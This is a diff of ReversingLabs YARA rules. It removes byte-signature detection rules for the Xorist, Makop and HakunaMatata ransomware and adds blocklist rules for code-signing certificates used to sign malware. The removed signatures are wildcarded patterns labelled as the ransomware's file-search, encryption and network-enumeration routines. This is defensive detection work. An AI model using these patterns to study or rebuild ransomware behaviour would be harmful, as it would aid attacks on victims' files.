-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_1_p* ) ) and ( all of ( $find_files_2_p* ) ) and ( all of ( $enum_resources_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KULBYT LLC" and ( pe.signatures [ i ] . serial == "00:e9:53:ad:a7:e8:f1:43:8e:5f:76:80:ff:59:9a:e4:3e" or pe.signatures [ i ] . serial == "e9:53:ad:a7:e8:f1:43:8e:5f:76:80:ff:59:9a:e4:3e" ) and 1614729600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Xorist : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_28C57Df09Ce7Cc3Fde2243Beb4D00101 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Xorist ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "804ae039-fc3b-5f19-860e-df9efe87ee4d"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "63e2edab-11a4-55ba-b042-c88b6d2750a5"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Xorist.yara#L1-L150"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11920-L11936"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c428838cdd103f62508a23c9333b08567625291e110aa437324ecf37c62dca36"
+		logic_hash = "84402dc0a58fca36424d8d6d13c60b80342bb3792f4e32e23878530264358726"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Xorist"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_and_encrypt_v1_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 0F
-            84 ?? ?? ?? ?? 48 89 45 ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            2D ?? ?? ?? ?? 50 C6 80 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 80 ?? ?? ?? ?? ?? ?? ?? ?? C6 80 ?? ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 58 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? C6 80 ?? ?? ?? ?? ?? E9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 2D ?? ?? ?? ?? C6 80 ?? ?? ?? ?? ?? A0 ?? ?? ?? ?? 3C ?? 75 ??
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80
-        }
-		$search_and_encrypt_v1_p2 = {
-            3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 74 ??
-            E9 ?? ?? ?? ?? EB ?? 8B 3D ?? ?? ?? ?? 8B 0F 83 C7 ?? 51 57 68 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B D8 57 E8 ?? ?? ?? ?? 03 F8 47 59 83 FB ?? 74 ?? 49 75 ?? E9 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ??
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 00 ?? EB ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ??
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 85 C0 0F 84 ?? ?? ?? ?? 48 A3 ?? ?? ?? ?? 6A ?? FF
-        }
-		$search_and_encrypt_v1_p3 = {
-            35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 F8 ?? 7D ?? FF 35 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A
-            ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 3D ?? ?? ?? ?? ?? 75 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8A 10 B9
-            ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? AC 32 C2 D0 C2 AA E2 ?? A1 ?? ?? ?? ?? 80
-            3D ?? ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? ?? EB ?? 80 3D ?? ?? ?? ?? ?? 75 ?? E8 ?? ?? ??
-            ?? EB ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? E8 ?? ??
-            ?? ?? C9 C3
-        }
-		$extract_rsrc_v1 = {
-            55 8B EC 83 C4 ?? B9 ?? ?? ?? ?? BF ?? ?? ?? ?? 51 57 0F 31 5F 59 25 ?? ?? ?? ?? C1
-            E8 ?? 83 C0 ?? AA E2 ?? 33 C0 AA 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 ?? C9 C3 89 45 ?? 50 6A ?? E8 ??
-            ?? ?? ?? 0B C0 75 ?? C9 C3 89 45 ?? FF 75 ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 ?? C9 C3
-            89 45 ?? 50 E8 ?? ?? ?? ?? 0B C0 75 ?? C9 C3 89 45 ?? 8B D8 6A ?? 6A ?? 6A ?? 6A ??
-            6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 89 45 ?? 6A ?? 6A
-            ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 53 FF 75 ?? E8 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? FF 75 ?? E8
-            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ??
-            C9 C3
-        }
-		$search_and_encrypt_v2_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 0F
-            84 ?? ?? ?? ?? 48 89 45 ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            2D ?? ?? ?? ?? 50 C6 80 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 80 ?? ?? ?? ?? ?? ?? ?? ?? C6 80 ?? ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 58 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? C6 80 ?? ?? ?? ?? ?? E9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 2D ?? ?? ?? ?? C6 80 ?? ?? ?? ?? ?? A0 ?? ?? ?? ?? 3C
-            ?? 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 53 68 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8
-            ?? 74 ?? E9 ?? ?? ?? ?? EB ?? 8B 3D ?? ?? ?? ?? 8B 0F 83 C7 ?? 51 57 68
-        }
-		$search_and_encrypt_v2_p2 = {
-            E8 ?? ?? ?? ?? 8B D8 57 E8 ?? ?? ?? ?? 03 F8 47 59 83 FB ?? 74 ?? 49 75 ?? E9 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 00 ?? 6A
-            ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 85 C0 0F
-            84 ?? ?? ?? ?? 48 A3 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ??
-            ?? 83 F8 ?? 7D ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ??
-            ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35
-            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? EB ?? 68 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8A 10 B9 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? AC 32 C2
-            D0 C2 AA E2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 35 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF
-            35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
-            ?? FF 75 ?? E8 ?? ?? ?? ?? C9 C3
-        }
-		$extract_rsrc_v2 = {
-            55 8B EC 83 C4 ?? 53 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 89
-            45 ?? 50 6A ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 89 45 ?? FF 75 ?? 6A ?? E8
-            ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 89 45 ?? 50 E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ??
-            ?? ?? ?? 89 45 ?? 8B F8 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 8B 45 ?? 83
-            E8 ?? 50 57 E8 ?? ?? ?? ?? 8B 1F 83 C7 ?? 53 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            0B C0 75 ?? E9 ?? ?? ?? ?? A3 ?? ?? ?? ?? 53 57 FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 03
-            FB 8B 1F 83 C7 ?? 53 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ??
-            ?? A3 ?? ?? ?? ?? 53 57 FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 03 FB 8B 1F 83 C7 ?? 53 6A
-            ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? A3 ?? ?? ?? ?? 53 57
-            FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 03 FB 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7
-            ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7
-            ?? FF 75 ?? E8 ?? ?? ?? ?? 5B C9 C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $extract_rsrc_v1 ) and ( all of ( $search_and_encrypt_v1_p* ) ) ) or ( ( $extract_rsrc_v2 ) and ( all of ( $search_and_encrypt_v2_p* ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WATER, s.r.o." and pe.signatures [ i ] . serial == "28:c5:7d:f0:9c:e7:cc:3f:de:22:43:be:b4:d0:01:01" and 1622678400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Makop : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_2D8Cfcf04209Dc7F771D8D18E462C35A : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Makop ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9b7d42f3-0417-5228-8b25-244224cbc414"
-		date = "2020-10-30"
-		modified = "2020-10-30"
+		id = "5ce5c076-87de-50f0-9fa1-a3efef8dd7f8"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Makop.yara#L1-L99"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11938-L11954"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0ff4739d32b4a775d07a5f22d551ed67025681d4986e4404c9a01ad4078468f3"
+		logic_hash = "2b784e46268d78046365400ef914d7ca673503c93962d0b0740ca2ac9faf7857"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Makop"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            8D 54 24 ?? 52 56 FF 15 ?? ?? ?? ?? 56 8B F8 6A ?? 89 7C 24 ?? FF 15 ?? ?? ?? ?? 50
-            FF 15 ?? ?? ?? ?? 83 FF ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 5F 5E 5B 8B E5 5D C3 33 F6 89 74 24 ?? EB ?? 8D A4 24 ?? ?? ?? ?? 8D 64 24 ??
-            66 8B 44 24 ?? 66 85 C0 0F 84 ?? ?? ?? ?? 66 3D ?? ?? 75 ?? 66 8B 44 24 ?? 66 85 C0
-            0F 84 ?? ?? ?? ?? 66 3D ?? ?? 75 ?? 66 83 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? 8D 44 24 ??
-            EB ?? 8D 9B ?? ?? ?? ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 8D 54 24 ?? 2B C2 D1 F8 83
-            E8 ?? 85 F6 8B F8 89 7C 24 ?? 75 ?? 8B 45 ?? 05 ?? ?? ?? ?? 03 C0 0F 84 ?? ?? ?? ??
-            50 56 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 89 44 24 ?? 8B F0 0F 84 ?? ?? ??
-            ?? F6 44 24 ?? ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 38 85 FF 74 ?? 8B 1F 8D 54 24
-            ?? 8B CA 2B D9 8D 49 ?? 0F B7 04 13 66 3D ?? ?? 72 ?? 66 3D ?? ?? 77 ?? 83 C0 ?? 0F
-            B7 C8 0F B7 02 66 3D ?? ?? 72 ?? 66 3D ?? ?? 77 ?? 83 C0 ?? 83 C2 ?? 66 85 C9 0F B7
-            C0 74 ?? 66 3B C8 74 ?? 0F B7 D0 0F B7 C1 2B C2 0F 84 ?? ?? ?? ?? 8B 7F ?? 85 FF 75
-            ?? 8B 7D ?? 8B 55 ?? 81 C7 ?? ?? ?? ?? 8B DE E8 ?? ?? ?? ?? 8B 4D ?? 8D 5C 4E ?? BA
-            ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 1C 56 8D 54 24 ?? BF ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4D ?? 8D 54 08 ?? 8B 45 ?? 52 56 50 E8
-        }
-		$find_files_p2 = {
-            83 C4 ?? E9 ?? ?? ?? ?? 8D 5C 24 ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 4D ??
-            80 79 ?? ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 03 FA 81 FF ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 8B
-            15 ?? ?? ?? ?? C6 44 24 ?? ?? 8B 7D ?? 81 C7 ?? ?? ?? ?? 8B DE E8 ?? ?? ?? ?? 8A 44
-            24 ?? 84 C0 75 ?? 8B 55 ?? 83 C7 ?? 8D 5E ?? E8 ?? ?? ?? ?? 8A 44 24 ?? 8A C8 8B 54
-            24 ?? F6 D9 1B C9 83 E1 ?? F6 D8 8B F1 8D BE ?? ?? ?? ?? 1B C0 83 E0 ?? 83 C0 ?? 03
-            45 ?? 8D 04 42 89 44 24 ?? 8D 58 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 8D BE
-            ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 85 D2 8B 74 24 ?? 8B 45 ?? 77 ??
-            3B 70 ?? 77 ?? B1 ?? EB ?? 8B 55 ?? C6 44 24 ?? ?? E9 ?? ?? ?? ?? 32 C9 88 48 ?? 8B
-            4C 24 ?? F6 C1 ?? 74 ?? C6 40 ?? ?? 89 48 ?? EB ?? C6 40 ?? ?? 50 89 50 ?? 89 70 ??
-            8B 44 24 ?? 50 E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 6A ??
-            50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 54 24 ?? 8D 4C 24 ?? 51 52 FF 15 ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 8B 74 24 ?? EB ?? 56 6A ?? FF 15
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 50 FF 15 ?? ?? ?? ?? 56 6A ?? FF 15 ??
-            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$encrypt_files = {
-            8B 50 ?? 8B 00 83 EC ?? 55 8B 2D ?? ?? ?? ?? 56 57 6A ?? 8B F9 8D 4C 24 ?? 51 52 50
-            53 FF D5 85 C0 0F 84 ?? ?? ?? ?? 8B 57 ?? 8B 47 ?? 33 F6 56 8D 4C 24 ?? 51 52 50 53
-            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 75 ?? B0 ?? 5F 5E 5D 83
-            C4 ?? C3 3B 47 ?? 73 ?? 8B C8 83 E1 ?? 74 ?? BE ?? ?? ?? ?? 2B F1 8B 4F ?? 56 03 C8
-            6A ?? 51 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 8B 4F ?? 03 C6 50 8D 54 24 ?? 52 51 6A
-            ?? 6A ?? 89 44 24 ?? 8B 44 24 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            8B 4C 24 ?? 8B 54 24 ?? 6A ?? 6A ?? 51 52 53 FF D5 85 C0 74 ?? 8B 4C 24 ?? 8B 57 ??
-            8B 3D ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 03 CE 51 52 53 FF D7 85 C0 74 ?? 8B 44 24 ??
-            8D 0C 30 8B 44 24 ?? 3B C1 72 ?? 01 44 24 ?? 8B 44 24 ?? 8B 50 ?? 8B 00 83 54 24 ??
-            ?? 6A ?? 6A ?? 52 50 53 FF D5 85 C0 74 ?? 6A ?? 8D 4C 24 ?? 51 6A ?? 8D 54 24 ?? 52
-            53 FF D7 85 C0 74 ?? 83 7C 24 ?? ?? 0F 83 ?? ?? ?? ?? 5F 5E 32 C0 5D 83 C4 ?? C3
-        }
-		$enum_network_resources = {
-            55 8B EC 83 E4 ?? 83 EC ?? 53 56 57 68 ?? ?? ?? ?? 6A ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            8B F0 85 F6 89 74 24 ?? 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 7D ?? 8D 44 24 ?? 50 51 6A ??
-            6A ?? 57 E8 ?? ?? ?? ?? 85 C0 74 ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B
-            7D ?? 68 ?? ?? ?? ?? 6A ?? 56 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 8D 54 24 ?? 52 56 8D 44 24 ?? 50 51 E8 ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 85 C0 75 ?? 8B 54 24 ?? 8B 45 ?? 52 50 EB ?? 8B 4C 24
-            ?? 8B 50 ?? 51 52 E8 ?? ?? ?? ?? 33 DB 83 C4 ?? 39 5C 24 ?? 76 ?? 83 C6 ?? 8D 49 ??
-            8B 46 ?? 85 C0 8B C8 75 ?? B9 ?? ?? ?? ?? 8B 46 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 51 8B
-            0E 51 50 E8 ?? ?? ?? ?? 8B 46 ?? 83 C4 ?? A8 ?? 74 ?? 8B 56 ?? 85 D2 74 ?? 85 FF 7E
-            ?? 8B 45 ?? 85 C0 74 ?? 8B 40 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 55 ?? 8B 4D ?? 52 83
-            EF ?? 57 8D 46 ?? 50 51 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? F6 06 ?? 74 ?? 50 E8 ?? ?? ??
-            ?? 8B 56 ?? 8B 45 ?? 83 C4 ?? 52 50 E8 ?? ?? ?? ?? 83 C3 ?? 83 C6 ?? 3B 5C 24 ?? 0F
-            82 ?? ?? ?? ?? 8B 74 24 ?? E9 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 8B 44 24 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_network_resources ) and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AA PLUS INVEST d.o.o." and pe.signatures [ i ] . serial == "2d:8c:fc:f0:42:09:dc:7f:77:1d:8d:18:e4:62:c3:5a" and 1631491200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Hakunamatata : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_016836311Fc39Fbb8E6F308Bb03Cc2B3 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects HakunaMatata ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "17438fcd-7a51-5fb6-96ac-38523bc1744f"
-		date = "2020-11-11"
-		modified = "2020-11-11"
+		id = "2c4061e8-0b8e-5c33-a746-6557449b17ed"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.HakunaMatata.yara#L1-L373"
